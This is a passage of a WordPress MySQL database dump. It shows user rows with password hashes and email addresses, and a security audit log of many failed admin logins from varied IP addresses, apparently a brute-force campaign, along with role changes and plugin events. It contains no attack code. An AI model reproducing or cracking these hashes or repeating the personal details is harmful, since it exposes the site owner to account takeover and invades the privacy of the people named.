`wp_users` -- LOCK TABLES `wp_users` WRITE; /*!40000 ALTER TABLE `wp_users` DISABLE KEYS */; INSERT INTO `wp_users` VALUES (2,'Olli','$P$BraiFeMxXqdJ6MoahLTOH3YUTGqD8f/','olli','olli@ollital.de','','2015-11-17 21:45:51','',0,'Olli Graf'),(4,'Tester','$P$B3TCwhFIeNmL5aOz7Yw9wJjgFfYdem/','tester','olli-graf@t9s.de','','2015-11-24 11:04:37','1448363078:$P$Bfl32oJ89W/NG9ItTaIlLfAHjgt.qW.',0,'Homer Simpson'); /*!40000 ALTER TABLE `wp_users` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wp_wsal_metadata` -- DROP TABLE IF EXISTS `wp_wsal_metadata`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wp_wsal_metadata` ( `id` bigint(20) NOT NULL AUTO_INCREMENT, `occurrence_id` bigint(20) NOT NULL, `name` varchar(100) NOT NULL, `value` longtext NOT NULL, PRIMARY KEY (`id`), KEY `occurrence_name` (`occurrence_id`,`name`) ) ENGINE=InnoDB AUTO_INCREMENT=3125 DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wp_wsal_metadata` -- LOCK TABLES `wp_wsal_metadata` WRITE; /*!40000 ALTER TABLE `wp_wsal_metadata` DISABLE KEYS */; INSERT INTO `wp_wsal_metadata` VALUES (1,1,'Attempts','1'),(2,1,'Username','admin_ollital'),(3,1,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(4,1,'ClientIP','5.147.41.205'),(5,1,'UserAgent','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(6,2,'Username','admin_ollital'),(7,2,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(8,2,'ClientIP','5.147.41.205'),(9,2,'UserAgent','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(10,3,'Attempts','1'),(11,3,'Username','admin_ollital'),(12,3,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(13,3,'ClientIP','140.125.80.4'),(14,3,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0'),(15,4,'Attempts','1'),(16,4,'Username','admin_ollital'),(17,4,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(18,4,'ClientIP','89.201.175.24'),(19,4,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0'),(20,5,'Attempts','1'),(21,5,'Username','admin_ollital'),(22,5,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(23,5,'ClientIP','109.73.170.66'),(24,5,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0'),(25,6,'Attempts','1'),(26,6,'Username','admin_ollital'),(27,6,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(28,6,'ClientIP','81.21.70.227'),(29,6,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0'),(30,7,'Attempts','1'),(31,7,'Username','admin_ollital'),(32,7,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(33,7,'ClientIP','69.175.77.242'),(34,7,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0'),(35,8,'Attempts','2'),(36,8,'Username','admin_ollital'),(37,8,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(38,8,'ClientIP','151.236.47.74'),(39,8,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0'),(40,9,'Attempts','1'),(41,9,'Username','admin_ollital'),(42,9,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(43,9,'ClientIP','173.247.244.100'),(44,9,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0'),(45,10,'Attempts','1'),(46,10,'Username','admin_ollital'),(47,10,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(48,10,'ClientIP','66.117.0.129'),(49,10,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0'),(50,11,'Attempts','1'),(51,11,'Username','admin_ollital'),(52,11,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(53,11,'ClientIP','188.114.114.26'),(54,11,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0'),(55,12,'Attempts','1'),(56,12,'Username','admin_ollital\r'),(57,12,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(58,12,'ClientIP','91.121.67.205'),(59,12,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0'),(60,13,'Attempts','1'),(61,13,'Username','admin_ollital'),(62,13,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(63,13,'ClientIP','174.36.192.66'),(64,13,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0'),(65,14,'Attempts','1'),(66,14,'Username','admin_ollital'),(67,14,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(68,14,'ClientIP','151.236.47.221'),(69,14,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0'),(70,15,'Attempts','1'),(71,15,'Username','admin_ollital'),(72,15,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(73,15,'ClientIP','198.55.115.130'),(74,15,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0'),(75,16,'Attempts','1'),(76,16,'Username','admin_ollital'),(77,16,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(78,16,'ClientIP','46.32.229.102'),(79,16,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0'),(80,17,'Attempts','1'),(81,17,'Username','admin_ollital'),(82,17,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(83,17,'ClientIP','192.99.100.176'),(84,17,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0'),(85,18,'Attempts','1'),(86,18,'Username','admin_ollital'),(87,18,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(88,18,'ClientIP','162.213.253.207'),(89,18,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0'),(90,19,'Attempts','1'),(91,19,'Username','admin_ollital'),(92,19,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(93,19,'ClientIP','95.173.188.243'),(94,19,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0'),(95,20,'Attempts','1'),(96,20,'Username','admin_ollital'),(97,20,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(98,20,'ClientIP','109.205.136.225'),(99,20,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0'),(100,21,'Username','admin_ollital'),(101,21,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(102,21,'ClientIP','195.128.40.90'),(103,21,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(104,22,'TargetUserID','2'),(105,22,'TargetUsername','Olli'),(106,22,'OldRole','author'),(107,22,'NewRole','administrator'),(108,22,'ClientIP','195.128.40.90'),(109,22,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(110,22,'CurrentUserID','1'),(111,22,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(112,23,'TargetUserID','2'),(113,23,'TargetUserData','O:8:\"stdClass\":2:{s:8:\"Username\";s:4:\"Olli\";s:5:\"Roles\";s:13:\"administrator\";}'),(114,23,'ClientIP','195.128.40.90'),(115,23,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(116,23,'CurrentUserID','1'),(117,23,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(118,24,'Username','Olli'),(119,24,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(120,24,'ClientIP','195.128.40.90'),(121,24,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(122,25,'Username','Olli'),(123,25,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(124,25,'ClientIP','195.128.40.90'),(125,25,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(126,26,'TargetUserID','3'),(127,26,'TargetUserData','O:8:\"stdClass\":5:{s:8:\"Username\";s:7:\"OlliTal\";s:9:\"FirstName\";s:4:\"Olli\";s:8:\"LastName\";s:5:\"Grafo\";s:5:\"Email\";s:18:\"ollirat@ollital.de\";s:5:\"Roles\";s:6:\"author\";}'),(128,26,'ClientIP','195.128.40.90'),(129,26,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(130,26,'CurrentUserID','2'),(131,26,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(132,27,'TargetUserID','1'),(133,27,'TargetUserData','O:8:\"stdClass\":5:{s:8:\"Username\";s:13:\"admin_ollital\";s:9:\"FirstName\";s:0:\"\";s:8:\"LastName\";s:0:\"\";s:5:\"Email\";s:20:\"piratolli@ollital.de\";s:5:\"Roles\";s:13:\"administrator\";}'),(134,27,'ClientIP','195.128.40.90'),(135,27,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(136,27,'CurrentUserID','2'),(137,27,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(138,28,'Username','Olli'),(139,28,'CurrentUserRoles','a:3:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";i:2;s:10:\"superadmin\";}'),(140,28,'ClientIP','195.128.40.90'),(141,28,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(142,29,'Attempts','1'),(143,29,'ClientIP','92.43.23.151'),(144,29,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0'),(145,29,'CurrentUserID','0'),(146,30,'Attempts','1'),(147,30,'ClientIP','173.199.176.200'),(148,30,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0'),(149,30,'CurrentUserID','0'),(150,31,'Attempts','1'),(151,31,'ClientIP','72.249.26.23'),(152,31,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0'),(153,31,'CurrentUserID','0'),(154,32,'Username','Olli'),(155,32,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(156,32,'ClientIP','109.44.3.113'),(157,32,'UserAgent','Mozilla/5.0 (Linux; Android 5.0.2; PLK-L01 Build/HONORPLK-L01) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36'),(158,33,'Plugin','O:8:\"stdClass\":6:{s:4:\"Name\";s:24:\"Jetpack by WordPress.com\";s:9:\"PluginURI\";s:17:\"http://jetpack.me\";s:7:\"Version\";s:5:\"3.8.0\";s:6:\"Author\";s:10:\"Automattic\";s:7:\"Network\";s:5:\"False\";s:15:\"plugin_dir_path\";s:38:\"/var/www/wordpress/wp-content/plugins/\";}'),(159,33,'ClientIP','109.44.3.113'),(160,33,'UserAgent','Mozilla/5.0 (Linux; Android 5.0.2; PLK-L01 Build/HONORPLK-L01) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36'),(161,33,'CurrentUserID','2'),(162,33,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(163,34,'Attempts','1'),(164,34,'ClientIP','198.154.250.247'),(165,34,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0'),(166,34,'CurrentUserID','0'),(167,35,'PluginFile','/var/www/wordpress/wp-content/plugins/jetpack/jetpack.php'),(168,35,'PluginData','O:8:\"stdClass\":5:{s:4:\"Name\";s:24:\"Jetpack by WordPress.com\";s:9:\"PluginURI\";s:17:\"http://jetpack.me\";s:7:\"Version\";s:5:\"3.8.0\";s:6:\"Author\";s:10:\"Automattic\";s:7:\"Network\";s:5:\"False\";}'),(169,35,'ClientIP','109.44.3.113'),(170,35,'UserAgent','Mozilla/5.0 (Linux; Android 5.0.2; PLK-L01 Build/HONORPLK-L01) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36'),(171,35,'CurrentUserID','2'),(172,35,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(173,36,'Attempts','1'),(174,36,'ClientIP','97.79.237.63'),(175,36,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0'),(176,36,'CurrentUserID','0'),(177,37,'PluginFile','/var/www/wordpress/wp-content/plugins/jetpack/jetpack.php'),(178,37,'PluginData','O:8:\"stdClass\":1:{s:4:\"Name\";s:7:\"Jetpack\";}'),(179,37,'ClientIP','109.44.3.113'),(180,37,'UserAgent','Mozilla/5.0 (Linux; Android 5.0.2; PLK-L01 Build/HONORPLK-L01) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36'),(181,37,'CurrentUserID','2'),(182,37,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(183,38,'Username','Olli'),(184,38,'CurrentUserRoles','a:3:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";i:2;s:10:\"superadmin\";}'),(185,38,'ClientIP','109.44.3.113'),(186,38,'UserAgent','Mozilla/5.0 (Linux; Android 5.0.2; PLK-L01 Build/HONORPLK-L01) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36'),(187,39,'Attempts','1'),(188,39,'ClientIP','5.9.213.43'),(189,39,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0'),(190,39,'CurrentUserID','0'),(191,40,'Attempts','1'),(192,40,'ClientIP','96.127.153.90'),(193,40,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0'),(194,40,'CurrentUserID','0'),(195,41,'Attempts','2'),(196,41,'ClientIP','173.214.189.213'),(197,41,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0'),(198,41,'CurrentUserID','0'),(199,42,'Attempts','1'),(200,42,'ClientIP','182.18.170.67'),(201,42,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0'),(202,42,'CurrentUserID','0'),(203,43,'Attempts','1'),(204,43,'ClientIP','111.118.165.66'),(205,43,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0'),(206,43,'CurrentUserID','0'),(207,44,'Attempts','1'),(208,44,'ClientIP','193.254.231.57'),(209,44,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0'),(210,44,'CurrentUserID','0'),(211,45,'Username','Olli'),(212,45,'CurrentUserRoles','a:3:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";i:2;s:10:\"superadmin\";}'),(213,45,'ClientIP','109.44.3.113'),(214,45,'UserAgent','Mozilla/5.0 (Linux; Android 5.0.2; PLK-L01 Build/HONORPLK-L01) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36'),(215,46,'Attempts','1'),(216,46,'ClientIP','85.25.200.186'),(217,46,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0'),(218,46,'CurrentUserID','0'),(219,47,'Attempts','1'),(220,47,'ClientIP','204.93.183.79'),(221,47,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0'),(222,47,'CurrentUserID','0'),(223,48,'Attempts','1'),(224,48,'ClientIP','67.222.146.236'),(225,48,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0'),(226,48,'CurrentUserID','0'),(227,49,'Attempts','1'),(228,49,'ClientIP','216.131.95.72'),(229,49,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0'),(230,49,'CurrentUserID','0'),(231,50,'Attempts','1'),(232,50,'ClientIP','66.35.94.120'),(233,50,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0'),(234,50,'CurrentUserID','0'),(235,51,'Attempts','2'),(236,52,'Attempts','1'),(237,51,'ClientIP','119.81.221.68'),(238,52,'ClientIP','119.81.221.68'),(239,51,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0'),(240,52,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0'),(241,51,'CurrentUserID','0'),(242,52,'CurrentUserID','0'),(243,53,'Username','Olli'),(244,53,'CurrentUserRoles','a:3:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";i:2;s:10:\"superadmin\";}'),(245,53,'ClientIP','109.44.3.113'),(246,53,'UserAgent','Mozilla/5.0 (Linux; Android 5.0.2; PLK-L01 Build/HONORPLK-L01) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36'),(247,54,'Attempts','1'),(248,54,'ClientIP','80.172.225.230'),(249,54,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0'),(250,54,'CurrentUserID','0'),(251,55,'Attempts','1'),(252,55,'ClientIP','134.173.66.147'),(253,55,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0'),(254,55,'CurrentUserID','0'),(255,56,'Attempts','1'),(256,56,'ClientIP','198.12.152.170'),(257,56,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0'),(258,56,'CurrentUserID','0'),(259,57,'Attempts','1'),(260,57,'ClientIP','108.166.167.90'),(261,57,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0'),(262,57,'CurrentUserID','0'),(263,58,'Attempts','1'),(264,58,'ClientIP','46.32.229.102'),(265,58,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0'),(266,58,'CurrentUserID','0'),(267,59,'Attempts','1'),(268,59,'ClientIP','173.199.143.96'),(269,59,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0'),(270,59,'CurrentUserID','0'),(271,60,'Attempts','1'),(272,60,'ClientIP','199.189.104.52'),(273,60,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0'),(274,60,'CurrentUserID','0'),(275,61,'Attempts','1'),(276,61,'ClientIP','184.154.116.26'),(277,61,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0'),(278,61,'CurrentUserID','0'),(279,62,'Attempts','1'),(280,62,'ClientIP','184.170.151.20'),(281,62,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0'),(282,62,'CurrentUserID','0'),(283,63,'Attempts','1'),(284,63,'ClientIP','66.71.249.41'),(285,63,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0'),(286,63,'CurrentUserID','0'),(287,64,'Username','Olli'),(288,64,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(289,64,'ClientIP','5.147.41.205'),(290,64,'UserAgent','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(291,65,'Attempts','1'),(292,65,'ClientIP','192.199.240.34'),(293,65,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0'),(294,65,'CurrentUserID','0'),(295,66,'Attempts','1'),(296,66,'ClientIP','173.199.176.200'),(297,66,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0'),(298,66,'CurrentUserID','0'),(299,67,'Attempts','1'),(300,67,'ClientIP','178.33.36.130'),(301,67,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0'),(302,67,'CurrentUserID','0'),(303,68,'Attempts','1'),(304,68,'ClientIP','173.214.189.213'),(305,68,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0'),(306,68,'CurrentUserID','0'),(307,69,'Attempts','1'),(308,69,'ClientIP','151.236.47.74'),(309,69,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0'),(310,69,'CurrentUserID','0'),(311,70,'Attempts','2'),(312,70,'ClientIP','216.131.95.72'),(313,70,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0'),(314,70,'CurrentUserID','0'),(315,71,'Attempts','1'),(316,71,'ClientIP','185.2.131.210'),(317,71,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0'),(318,71,'CurrentUserID','0'),(319,72,'Attempts','1'),(320,72,'ClientIP','65.99.201.29'),(321,72,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0'),(322,72,'CurrentUserID','0'),(323,73,'Attempts','1'),(324,73,'ClientIP','218.188.219.30'),(325,73,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0'),(326,73,'CurrentUserID','0'),(327,74,'Attempts','1'),(328,74,'ClientIP','176.10.114.135'),(329,74,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0'),(330,74,'CurrentUserID','0'),(331,75,'Attempts','2'),(332,75,'ClientIP','216.245.197.138'),(333,75,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0'),(334,75,'CurrentUserID','0'),(335,76,'Attempts','1'),(336,76,'ClientIP','184.107.229.18'),(337,76,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0'),(338,76,'CurrentUserID','0'),(339,77,'Attempts','1'),(340,77,'ClientIP','173.199.143.37'),(341,77,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0'),(342,77,'CurrentUserID','0'),(343,78,'Attempts','1'),(344,78,'ClientIP','162.144.85.203'),(345,78,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0'),(346,78,'CurrentUserID','0'),(347,79,'Attempts','1'),(348,79,'ClientIP','199.116.252.177'),(349,79,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0'),(350,79,'CurrentUserID','0'),(351,80,'Attempts','1'),(352,80,'ClientIP','95.172.239.20'),(353,80,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0'),(354,80,'CurrentUserID','0'),(355,81,'Attempts','1'),(356,81,'ClientIP','217.33.74.31'),(357,81,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0'),(358,81,'CurrentUserID','0'),(359,82,'Attempts','1'),(360,82,'ClientIP','216.131.91.222'),(361,82,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0'),(362,82,'CurrentUserID','0'),(363,83,'Attempts','1'),(364,83,'ClientIP','67.228.183.136'),(365,83,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0'),(366,83,'CurrentUserID','0'),(367,84,'Attempts','1'),(368,84,'ClientIP','94.229.164.68'),(369,84,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0'),(370,84,'CurrentUserID','0'),(371,85,'Attempts','1'),(372,85,'ClientIP','198.154.218.73'),(373,85,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0'),(374,85,'CurrentUserID','0'),(375,86,'Attempts','1'),(376,86,'ClientIP','103.244.44.76'),(377,86,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0'),(378,86,'CurrentUserID','0'),(379,87,'Attempts','1'),(380,87,'ClientIP','50.97.118.114'),(381,87,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0'),(382,87,'CurrentUserID','0'),(383,88,'Attempts','1'),(384,88,'ClientIP','179.43.162.66'),(385,88,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0'),(386,88,'CurrentUserID','0'),(387,89,'Attempts','1'),(388,89,'ClientIP','109.247.166.134'),(389,89,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0'),(390,89,'CurrentUserID','0'),(391,90,'Attempts','1'),(392,90,'ClientIP','146.83.180.8'),(393,90,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0'),(394,90,'CurrentUserID','0'),(395,91,'Attempts','1'),(396,91,'ClientIP','46.32.229.102'),(397,91,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0'),(398,91,'CurrentUserID','0'),(399,92,'Attempts','1'),(400,92,'ClientIP','205.251.134.99'),(401,92,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0'),(402,92,'CurrentUserID','0'),(403,93,'Attempts','1'),(404,93,'ClientIP','198.57.139.196'),(405,93,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0'),(406,93,'CurrentUserID','0'),(407,94,'Attempts','1'),(408,94,'ClientIP','204.77.2.185'),(409,94,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 